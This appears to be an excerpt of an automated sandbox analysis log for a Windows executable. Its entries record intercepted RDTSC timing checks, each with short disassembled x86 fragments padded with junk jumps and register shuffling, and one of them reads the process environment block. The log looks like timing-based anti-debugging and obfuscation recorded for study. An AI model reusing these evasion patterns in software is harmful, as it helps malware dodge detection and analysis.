Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 1281A1D second address: 1281A28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F1C29045F06h 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 757001A second address: 757004B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C28FAFD6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov si, A72Bh 0x0000000f mov ch, 8Bh 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F1C28FAFD74h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 757004B second address: 757004F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 757004F second address: 7570055 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570184 second address: 75701F9 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 43A24CDFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov bx, cx 0x0000000c popad 0x0000000d mov esi, dword ptr [772406ECh] 0x00000013 jmp 00007F1C29045F0Eh 0x00000018 test esi, esi 0x0000001a jmp 00007F1C29045F10h 0x0000001f jne 00007F1C29046D77h 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F1C29045F0Eh 0x0000002c xor eax, 5AC901A8h 0x00000032 jmp 00007F1C29045F0Bh 0x00000037 popfd 0x00000038 call 00007F1C29045F18h 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75701F9 second address: 7570228 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push ebp 0x00000007 jmp 00007F1C28FAFD6Ch 0x0000000c mov dword ptr [esp], edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F1C28FAFD77h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570228 second address: 757022E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 757022E second address: 7570232 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570232 second address: 75702B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call dword ptr [77210B60h] 0x0000000e mov eax, 766BE5E0h 0x00000013 ret 0x00000014 pushad 0x00000015 call 00007F1C29045F0Dh 0x0000001a pop edx 0x0000001b mov ax, 46E3h 0x0000001f popad 0x00000020 push 00000044h 0x00000022 jmp 00007F1C29045F16h 0x00000027 pop edi 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F1C29045F0Dh 0x00000031 sub esi, 437D4896h 0x00000037 jmp 00007F1C29045F11h 0x0000003c popfd 0x0000003d pushfd 0x0000003e jmp 00007F1C29045F10h 0x00000043 xor al, FFFFFFB8h 0x00000046 jmp 00007F1C29045F0Bh 0x0000004b popfd 0x0000004c popad 0x0000004d rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75702B7 second address: 75702F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 mov ah, 76h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jmp 00007F1C28FAFD78h 0x00000011 mov dword ptr [esp], edi 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F1C28FAFD77h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75702F7 second address: 7570371 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C29045F19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [eax] 0x0000000b pushad 0x0000000c push ecx 0x0000000d pushfd 0x0000000e jmp 00007F1C29045F13h 0x00000013 add ecx, 16D3EA9Eh 0x00000019 jmp 00007F1C29045F19h 0x0000001e popfd 0x0000001f pop ecx 0x00000020 mov di, B414h 0x00000024 popad 0x00000025 mov eax, dword ptr fs:[00000030h] 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e call 00007F1C29045F14h 0x00000033 pop ecx 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570371 second address: 757039D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1C28FAFD6Dh 0x00000009 jmp 00007F1C28FAFD6Bh 0x0000000e popfd 0x0000000f mov bx, cx 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push dword ptr [eax+18h] 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 757039D second address: 75703B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C29045F13h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75703B4 second address: 75703BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75703BA second address: 75703BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570407 second address: 757040B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 757040B second address: 7570411 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570411 second address: 75704DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C28FAFD6Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b pushad 0x0000000c pushad 0x0000000d mov di, cx 0x00000010 pushfd 0x00000011 jmp 00007F1C28FAFD78h 0x00000016 xor ecx, 77334AD8h 0x0000001c jmp 00007F1C28FAFD6Bh 0x00000021 popfd 0x00000022 popad 0x00000023 mov ebx, ecx 0x00000025 popad 0x00000026 je 00007F1C98BFEFB5h 0x0000002c jmp 00007F1C28FAFD72h 0x00000031 sub eax, eax 0x00000033 pushad 0x00000034 call 00007F1C28FAFD77h 0x00000039 mov edi, esi 0x0000003b pop ecx 0x0000003c call 00007F1C28FAFD75h 0x00000041 pushfd 0x00000042 jmp 00007F1C28FAFD70h 0x00000047 sub si, B9F8h 0x0000004c jmp 00007F1C28FAFD6Bh 0x00000051 popfd 0x00000052 pop ecx 0x00000053 popad 0x00000054 mov dword ptr [esi], edi 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F1C28FAFD72h 0x0000005d rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75704DD second address: 75704E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75704E3 second address: 75704E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75704E7 second address: 7570503 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C29045F0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570503 second address: 7570507 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570507 second address: 757050D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 757050D second address: 7570513 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570513 second address: 7570517 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570517 second address: 757052B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+08h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ax, bx 0x00000011 push edi 0x00000012 pop ecx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 757052B second address: 7570548 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1C29045F19h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570548 second address: 757056F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+0Ch], eax 0x0000000b jmp 00007F1C28FAFD6Dh 0x00000010 mov eax, dword ptr [ebx+4Ch] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov cx, di 0x00000019 mov edx, 2D9E599Ah 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 757056F second address: 7570575 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570575 second address: 7570579 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570579 second address: 75705AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+10h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e movsx edx, ax 0x00000011 pushfd 0x00000012 jmp 00007F1C29045F0Ch 0x00000017 jmp 00007F1C29045F15h 0x0000001c popfd 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75705AE second address: 75705B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75705B4 second address: 75705C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+50h] 0x0000000b pushad 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75705C3 second address: 75705E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov edx, 4F0870B2h 0x0000000a popad 0x0000000b mov dword ptr [esi+14h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F1C28FAFD74h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75705E7 second address: 7570634 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 59B2D274h 0x00000008 call 00007F1C29045F0Dh 0x0000000d pop esi 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov eax, dword ptr [ebx+54h] 0x00000014 jmp 00007F1C29045F17h 0x00000019 mov dword ptr [esi+18h], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F1C29045F15h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570634 second address: 757069D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov edi, 67FF2EA0h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [ebx+58h] 0x00000010 pushad 0x00000011 movsx edi, cx 0x00000014 popad 0x00000015 mov dword ptr [esi+1Ch], eax 0x00000018 pushad 0x00000019 mov ecx, edx 0x0000001b push ebx 0x0000001c mov eax, 733703E7h 0x00000021 pop esi 0x00000022 popad 0x00000023 mov eax, dword ptr [ebx+5Ch] 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007F1C28FAFD74h 0x0000002f and ecx, 67898B48h 0x00000035 jmp 00007F1C28FAFD6Bh 0x0000003a popfd 0x0000003b jmp 00007F1C28FAFD78h 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 757069D second address: 75706A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75706A3 second address: 757070F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C28FAFD6Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+20h], eax 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F1C28FAFD6Ch 0x00000015 xor cl, 00000008h 0x00000018 jmp 00007F1C28FAFD6Bh 0x0000001d popfd 0x0000001e call 00007F1C28FAFD78h 0x00000023 mov edx, ecx 0x00000025 pop esi 0x00000026 popad 0x00000027 mov eax, dword ptr [ebx+60h] 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F1C28FAFD78h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 757070F second address: 7570760 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 movsx ebx, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+24h], eax 0x0000000e jmp 00007F1C29045F14h 0x00000013 mov eax, dword ptr [ebx+64h] 0x00000016 jmp 00007F1C29045F10h 0x0000001b mov dword ptr [esi+28h], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F1C29045F17h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570760 second address: 7570778 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1C28FAFD74h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570778 second address: 757084D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C29045F0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+68h] 0x0000000e jmp 00007F1C29045F16h 0x00000013 mov dword ptr [esi+2Ch], eax 0x00000016 pushad 0x00000017 pushad 0x00000018 push esi 0x00000019 pop edx 0x0000001a pushfd 0x0000001b jmp 00007F1C29045F18h 0x00000020 xor si, 20A8h 0x00000025 jmp 00007F1C29045F0Bh 0x0000002a popfd 0x0000002b popad 0x0000002c push ecx 0x0000002d movsx ebx, ax 0x00000030 pop esi 0x00000031 popad 0x00000032 mov ax, word ptr [ebx+6Ch] 0x00000036 jmp 00007F1C29045F17h 0x0000003b mov word ptr [esi+30h], ax 0x0000003f pushad 0x00000040 movzx ecx, di 0x00000043 push ebx 0x00000044 call 00007F1C29045F0Ch 0x00000049 pop esi 0x0000004a pop edx 0x0000004b popad 0x0000004c mov ax, word ptr [ebx+00000088h] 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 pushfd 0x00000057 jmp 00007F1C29045F13h 0x0000005c adc cx, 20AEh 0x00000061 jmp 00007F1C29045F19h 0x00000066 popfd 0x00000067 push esi 0x00000068 pop ebx 0x00000069 popad 0x0000006a rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 757084D second address: 7570852 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570852 second address: 757088F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, C63Ch 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov word ptr [esi+32h], ax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov ebx, ecx 0x00000014 pushfd 0x00000015 jmp 00007F1C29045F18h 0x0000001a sub ch, FFFFFF88h 0x0000001d jmp 00007F1C29045F0Bh 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 757088F second address: 7570906 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1C28FAFD72h 0x00000009 add ax, 1EE8h 0x0000000e jmp 00007F1C28FAFD6Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov eax, dword ptr [ebx+0000008Ch] 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F1C28FAFD6Bh 0x00000024 and ch, 0000002Eh 0x00000027 jmp 00007F1C28FAFD79h 0x0000002c popfd 0x0000002d popad 0x0000002e mov dword ptr [esi+34h], eax 0x00000031 jmp 00007F1C28FAFD6Eh 0x00000036 mov eax, dword ptr [ebx+18h] 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c pushad 0x0000003d popad 0x0000003e push edx 0x0000003f pop esi 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570906 second address: 7570974 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, 48h 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+38h], eax 0x0000000b pushad 0x0000000c push edi 0x0000000d pushfd 0x0000000e jmp 00007F1C29045F12h 0x00000013 or al, 00000038h 0x00000016 jmp 00007F1C29045F0Bh 0x0000001b popfd 0x0000001c pop esi 0x0000001d mov dh, E0h 0x0000001f popad 0x00000020 mov eax, dword ptr [ebx+1Ch] 0x00000023 pushad 0x00000024 movsx ebx, si 0x00000027 popad 0x00000028 mov dword ptr [esi+3Ch], eax 0x0000002b jmp 00007F1C29045F14h 0x00000030 mov eax, dword ptr [ebx+20h] 0x00000033 jmp 00007F1C29045F10h 0x00000038 mov dword ptr [esi+40h], eax 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570974 second address: 7570978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570978 second address: 757097E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 757097E second address: 75709A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C28FAFD74h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+00000080h] 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75709A2 second address: 75709BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C29045F19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75709BF second address: 75709CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1C28FAFD6Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75709CF second address: 75709E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C29045F0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push 00000001h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 movsx edx, ax 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75709E9 second address: 75709EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75709EF second address: 75709F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75709F3 second address: 7570A13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C28FAFD72h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov cx, 1853h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570AF3 second address: 7570B4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C29045F12h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F1C98C94AC0h 0x0000000f jmp 00007F1C29045F10h 0x00000014 mov eax, dword ptr [ebp-0Ch] 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F1C29045F0Dh 0x00000020 and si, E9B6h 0x00000025 jmp 00007F1C29045F11h 0x0000002a popfd 0x0000002b mov ax, 2BA7h 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570B4F second address: 7570B9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C28FAFD6Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F1C28FAFD73h 0x00000015 and esi, 1B2CD79Eh 0x0000001b jmp 00007F1C28FAFD79h 0x00000020 popfd 0x00000021 mov ax, 5767h 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570B9F second address: 7570BA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570BA5 second address: 7570BA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570BA9 second address: 7570BBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebx+78h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570BBA second address: 7570BBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570BBE second address: 7570BDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C29045F18h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570BDA second address: 7570BE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570BE0 second address: 7570BE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570BE4 second address: 7570C25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000001h 0x0000000a jmp 00007F1C28FAFD79h 0x0000000f nop 0x00000010 pushad 0x00000011 mov si, 0AB3h 0x00000015 mov cx, 9F0Fh 0x00000019 popad 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F1C28FAFD70h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570C25 second address: 7570C37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1C29045F0Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570C37 second address: 7570C8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C28FAFD6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007F1C28FAFD76h 0x00000011 lea eax, dword ptr [ebp-08h] 0x00000014 jmp 00007F1C28FAFD70h 0x00000019 nop 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F1C28FAFD77h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570C8C second address: 7570CCC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 mov ax, dx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 pushfd 0x00000013 jmp 00007F1C29045F0Fh 0x00000018 xor cl, FFFFFF9Eh 0x0000001b jmp 00007F1C29045F19h 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
